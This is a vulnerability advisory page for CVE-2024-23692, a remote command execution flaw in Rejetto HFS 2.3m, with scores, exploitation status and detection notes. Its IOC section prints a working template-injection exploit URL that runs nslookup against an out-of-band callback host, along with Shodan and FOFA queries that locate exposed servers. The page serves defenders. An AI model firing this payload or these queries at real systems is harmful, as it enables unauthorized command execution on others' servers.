cbcvebase.
CVE-2024-23692
published 2024-05-31

CVE-2024-23692: Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-07-30
Exploited in the wild
EPSS
99.48%
99.9th percentile
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.

Affected

1 ranges
VendorProductVersion rangeFixed in
rejettohttp_file_server<= 2.4

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
othershodan:product:"HttpFileServer httpd"
otherfofa:"HttpFileServer" && server=="HFS 2.3m"
processmshta.exe
  • Exploit requests use HTTP GET with template injection payload in query parameters; look for URL-encoded newlines (%0A) and HFS macro syntax (e.g., {.exec|...}) in the query string targeting the HFS root path.
  • HATVIBE C2 communication uses HTTP PUT requests; monitor for anomalous PUT traffic from hosts running HFS to the listed C2 IPs/domains.
  • Detect HATVIBE persistence via scheduled tasks spawning mshta.exe; alert on scheduled task creation invoking mshta.exe on Windows hosts.
  • Nuclei template matcher checks HTTP response body for the string 'rejetto' as a confirmation of successful exploitation; use this as a detection signal in HTTP response inspection.
  • Insikt Group provides Snort and YARA rules for HATVIBE and CHERRYSPY; deploy these rules in IDS/IPS for network and host-based detection of TAG-110 tooling delivered via CVE-2024-23692 exploitation.
  • ·The Nuclei template uses an out-of-band DNS interaction (interactsh) as the primary matcher; the exploit payload requires a live interactsh callback to confirm RCE and will not fire in air-gapped or DNS-blocked environments.
  • ·The exploit sets a 15-second execution timeout for the injected command; detections relying on response timing or content may miss executions that exceed this window.
  • ·The C2 IPs and domains listed are associated with TAG-110's broader HATVIBE/CHERRYSPY campaign and are not exclusively tied to CVE-2024-23692 exploitation; they should be used as campaign-level indicators rather than exploit-specific ones.
  • ·Rejetto HFS 2.3m is no longer supported; no patch exists for the 2.x branch. The only remediation is migration to HFS version 3.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.